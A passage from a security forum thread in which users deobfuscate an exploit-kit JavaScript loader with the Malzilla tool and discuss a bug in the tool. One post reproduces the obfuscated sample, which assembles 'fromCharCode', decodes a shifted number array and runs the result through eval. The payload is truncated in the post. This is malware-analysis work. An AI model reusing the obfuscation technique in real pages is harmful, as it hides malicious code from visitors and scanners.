Topic: Deobfuscate exploit kits using Malzilla


January 03, 2012, 10:23:30 pm
Reply #15

shellc0de

Another version:

Code:
<html><body><script>
g='rom';
g=g+'C';
g=g+'harCod';
g=g+'e';
if(window["documen"+"t"])aa=([].unshift+"");
aa=aa.split('').pop();
a='94&105&93&111&103&95&104&110&40&113&108&99&110&95&34&33&54&93&95&104&110&95&108&56&54&98&43&56&74&102&95&91&109&95&26&113&91&99&110&26&106&91&97&95&26&99&109&26&102&105&91&94&99&104&97&40&40&40&54&41&98&43&56&54&41&93&95&104&110&95&108&56&54&98&108&56&33&35&53[....it goes on.....]'.split("&");
md='a';
v=aa;
if(!(("\n"!=v)&&(v!='}'))){w=String;e=window['eval'];}
c='';
i=0;
s=x=a;
while(i!=s['length']){
c=c+w['f'+g](parseInt(s[0+i]) + 7 - 1);
i++;
}
e(c);
</script></body></html>

Also found a bug in malzilla while messing with the script: http://i.imgur.com/8zbZs.png

NINJA EDIT: This is how far I got at deobfuscating but I'm not familiar enough with js:
Code:
//first I find and replace all "&" with "," (so a is a plain array of the numbers, not a string)
for (i = 0; i < a.length; i++) {      // "<" rather than "<=": a[a.length] is undefined
  a[i] = parseInt(a[i], 10) + 6;      // same shift the loader applies: + 7 - 1
  document.write(a[i]);
  document.write(',');
}
Then I paste the output into the misc decoder and click decimal to ascii.

EDIT2: Hey I figured it out! I see someone else already did too: http://www.virustotal.com/file-scan/report.html?id=19321549c048af5767c3ff1cfcac22e746dfddf8e09300276475834d668e4938-1325719223

January 04, 2012, 07:28:23 pm
Reply #16

MysteryFCM

Yep, come across that myself a few times, spoke to Bobby about it, but can't remember what he said caused it.

You can find the source code for Malzilla here if you'd like to try and identify the cause yourself:

http://sourceforge.net/projects/malzilla/files/Malzilla%20Win32%20Source%20package/

Not seen Bobby around for over a year or so, so unsure if he's still working on it.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net